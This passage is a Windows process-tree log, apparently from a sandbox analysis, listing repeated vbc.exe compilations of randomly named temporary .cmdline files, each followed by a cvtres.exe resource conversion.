C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA697.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC26D95D8A19E4A4F9E2E934275CE8699.TMP"6⤵PID:4112
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mlssxjwj\mlssxjwj.cmdline"5⤵PID:8516
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESADF9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFB65CE4AC6164550A389E416CCA41283.TMP"6⤵PID:8384
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kldoqyng\kldoqyng.cmdline"5⤵PID:6800
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2EB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc42AF6BE1F04348E38B9E672468AA8AC0.TMP"6⤵PID:8032
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lwgd04u1\lwgd04u1.cmdline"5⤵PID:5620
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB7BD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6D6C445545AC4DA889E91509C5CC6A6.TMP"6⤵PID:7408
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mbd4kvsn\mbd4kvsn.cmdline"5⤵PID:7192
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB19.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc25C3AEDD2341468AB9C5B736C663F881.TMP"6⤵PID:3984
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ipnxlqy1\ipnxlqy1.cmdline"5⤵PID:8764
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF8D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD3A8177160A248A7B13BB098E297CE74.TMP"6⤵PID:6104
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\g2qofpph\g2qofpph.cmdline"5⤵PID:8428
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC317.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE60C4766FD514E62927E19D3C4A286C.TMP"6⤵PID:8384
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xfniuyib\xfniuyib.cmdline"5⤵PID:7456
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC644.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF2F6C1DE565A44A89B187DD5792D02C.TMP"6⤵PID:8200
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tzyps0tl\tzyps0tl.cmdline"5⤵PID:8320
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC876.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9BC9A24BA2E341579FC1EA79F5AD4847.TMP"6⤵PID:7800
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ytba2oa4\ytba2oa4.cmdline"5⤵PID:7548
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC3F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9C56D9DB655743D6AD40AE5684D5E0.TMP"6⤵PID:6460
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\auhltgte\auhltgte.cmdline"5⤵PID:8020
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF1E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5E0C19ECBD544226ACAF5C5C80A44CD1.TMP"6⤵PID:8084
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\llhymptv\llhymptv.cmdline"5⤵PID:6768
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD160.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF4232F467936456F921ECCBB138FFC5A.TMP"6⤵PID:2192
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nrzbgixc\nrzbgixc.cmdline"5⤵PID:7328
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD4BB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA23AF0D6C757425C97AA4DC3E4A4947.TMP"6⤵PID:6400
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\f2wdgfww\f2wdgfww.cmdline"5⤵PID:7356
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD9AD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc963A6E5741B54B5B9723FC9DB3374BEA.TMP"6⤵PID:7664
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wihgybic\wihgybic.cmdline"5⤵PID:2100
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE60.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc61898A09EBE247EA9BA58DD529E28E2.TMP"6⤵PID:5132
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lpz5jxmq\lpz5jxmq.cmdline"5⤵PID:5296
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE229.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCDD4A3337E87487CBF2D679371ABC54.TMP"6⤵PID:5488
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\sjddkww4\sjddkww4.cmdline"5⤵PID:7276
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE536.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBA76A4D936C4479698C29229E2B4B359.TMP"6⤵PID:6396
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ncykcsrb\ncykcsrb.cmdline"5⤵PID:1144
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE95C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE7A9B653B2EA42938428876C7993232B.TMP"6⤵PID:7232
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\oe2f2dkc\oe2f2dkc.cmdline"5⤵PID:6024
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEE6D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc31C1B8CA4BE444648BAD517A052A9DE.TMP"6⤵PID:9196
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\0ovjja00\0ovjja00.cmdline"5⤵PID:9028
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF2D2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2A68ED7C5324F1F9ED87EAD3EF88613.TMP"6⤵PID:8784
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\guwtuw3b\guwtuw3b.cmdline"5⤵PID:8916
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF8AE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8C70ED94B7924AD9A6156418206739D7.TMP"6⤵PID:7644
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3qk20trw\3qk20trw.cmdline"5⤵PID:6556
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB10.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc21316C0387EC469FA85A39FF94471FB4.TMP"6⤵PID:7412
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\przertov\przertov.cmdline"5⤵PID:6672
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF26.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc866AFB2BC2F411D9C57395D6AA5C23.TMP"6⤵PID:7864
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\v4buqscb\v4buqscb.cmdline"5⤵PID:7800
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES263.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc42F7F30B69FB40ADAADC8B357116672.TMP"6⤵PID:6460
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\2esmvwgk\2esmvwgk.cmdline"5⤵PID:4200
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCE53359CEDF438083236FADEB1E69D3.TMP"6⤵PID:7460
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\aorbnm55\aorbnm55.cmdline"5⤵PID:9004
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES764.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF831878BF54D2C9BC53A13CF1FDC2.TMP"6⤵PID:7280
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\stvkfrum\stvkfrum.cmdline"5⤵PID:6396
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES929.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA9885BCF667D44CEA1EB7EE5A755FBA1.TMP"6⤵PID:2720
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zzacrhol\zzacrhol.cmdline"5⤵PID:4496
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB1D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7F5EAEC7A50348798D3BB7162F6EB3F.TMP"6⤵PID:6048
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xv2wyrrq\xv2wyrrq.cmdline"5⤵PID:7492
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD9E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc711D481E6A7844ABA57DB59836833A77.TMP"6⤵PID:9008
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\slwpiyrt\slwpiyrt.cmdline"5⤵PID:7056
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10F9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc38B6AF61C4E14BB88BAE501750B7A4BD.TMP"6⤵PID:6072
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\npg33cr4\npg33cr4.cmdline"5⤵PID:7976
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES131C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4DAC035D2CEB4EC59EFEE9F59512EE2C.TMP"6⤵PID:4256
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\medsripm\medsripm.cmdline"5⤵PID:3496
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES17B0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4791D648F6B545B793AC25C55EDE8A9B.TMP"6⤵PID:7460
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\c0upe4c3\c0upe4c3.cmdline"5⤵PID:8568
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1D3E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc276CFAD68BCF4AD0929D287CB16F5E0.TMP"6⤵PID:8020
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\sdrzxhoi\sdrzxhoi.cmdline"5⤵PID:7760
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2358.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFEA54178B4EC4E258AC3829764A17BA.TMP"6⤵PID:8544
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\w33awado\w33awado.cmdline"5⤵PID:64
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2953.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc619D92B6145E42749680BCB548A1ABA.TMP"6⤵PID:368
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fs134pca\fs134pca.cmdline"5⤵PID:4812
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2D2C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc59FF3A11478A4CB8A8FDB4266186916.TMP"6⤵PID:4868
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wirlazr2\wirlazr2.cmdline"5⤵PID:2780
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3058.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc84370A95594C41FEBDD0A09CC427C887.TMP"6⤵PID:2024
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\o3tjtjge\o3tjtjge.cmdline"5⤵PID:7164
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3394.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc464364121E5141E1BD2CE88E4D84391.TMP"6⤵PID:6212
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kvekw1ak\kvekw1ak.cmdline"5⤵PID:8184
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES370F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA73D3735A97944808171CFEE68C64175.TMP"6⤵PID:7120
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hozsfejl\hozsfejl.cmdline"5⤵PID:4060
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES399F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcAE0A3D0F6D0B4A6A8E19CC5F6A6554FE.TMP"6⤵PID:5956
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\oarklxxp\oarklxxp.cmdline"5⤵PID:7312
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3BC2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc99448B409B404006B3FA6ADFA0CB5655.TMP"6⤵PID:9000
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pae1pxjb\pae1pxjb.cmdline"5⤵PID:8556
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D78.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc41971E1EBCC44CE4B5D0DFE11298DF5E.TMP"6⤵PID:6216
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\14c15ubl\14c15ubl.cmdline"5⤵PID:7356
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4131.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5CF2191D654E45A195D3EAC969F7A02E.TMP"6⤵PID:7568
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mhqfubph\mhqfubph.cmdline"5⤵PID:5552
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES43D1.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5E0BAD922BF94E81A8EBD6D385B388B2.TMP"6⤵PID:8040
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dmj1g3qr\dmj1g3qr.cmdline"5⤵PID:6040
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES475B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc91477639A68C4CAF948ADE443AE7CA4.TMP"6⤵PID:3852
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\g5dpqpi5\g5dpqpi5.cmdline"5⤵PID:4544
-
